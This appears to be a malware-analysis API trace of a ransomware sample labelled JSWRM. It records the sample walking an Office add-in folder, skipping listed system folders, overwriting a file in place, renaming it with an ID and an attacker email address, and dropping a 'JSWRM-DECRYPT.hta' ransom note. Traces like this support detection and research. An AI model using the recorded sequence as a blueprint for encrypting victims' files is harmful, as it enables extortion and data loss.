[0124.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0124.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.163] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4a98712, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4abe91a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0124.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.164] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61b1409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61b1409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61d7668, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.164] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0124.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.165] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13a8299e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aa8b23, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fd42, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.he.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2=".") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="..") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="...") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="windows") returned -1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="recovery") returned -1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="perflogs") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="documents and settings") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="system volume information") returned -1 [0124.165] lstrcmpiW (lpString1="PowerViewRes.he.xap", lpString2="msocache") returned 1 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.he.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.he.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.he.xap", lpUsedDefaultChar=0x0) returned 19 [0124.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.he.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.he.xap", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.he.xap", lpUsedDefaultChar=0x0) returned 19 [0124.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0124.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\PowerViewRes.he.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\powerviewres.he.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.166] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=326978) returned 1 [0124.166] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.166] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.180] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.180] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.180] CloseHandle (hObject=0x338) returned 1 [0124.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0124.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0124.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\PowerViewRes.he.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\powerviewres.he.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\PowerViewRes.he.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\powerviewres.he.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0124.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.182] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13a8299e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13aa8b23, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4fd42, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.he.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.182] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0124.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0124.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.183] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1428e945, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="...") returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="windows") returned -1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="recovery") returned -1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="perflogs") returned -1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="documents and settings") returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="$RECYCLE.BIN") returned 1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="system volume information") returned -1 [0124.183] lstrcmpiW (lpString1="hi", lpString2="msocache") returned -1 [0124.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0124.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0124.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0124.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0124.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\jswrm-decrypt.hta")) returned 0xffffffff [0124.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0124.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0124.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.186] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.186] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.187] CloseHandle (hObject=0x314) returned 1 [0124.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0124.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0124.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0124.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0124.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\hi\\jswrm-decrypt.hta")) returned 0x20 [0124.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0124.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.188] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\hi\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1428e945, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40afb139, 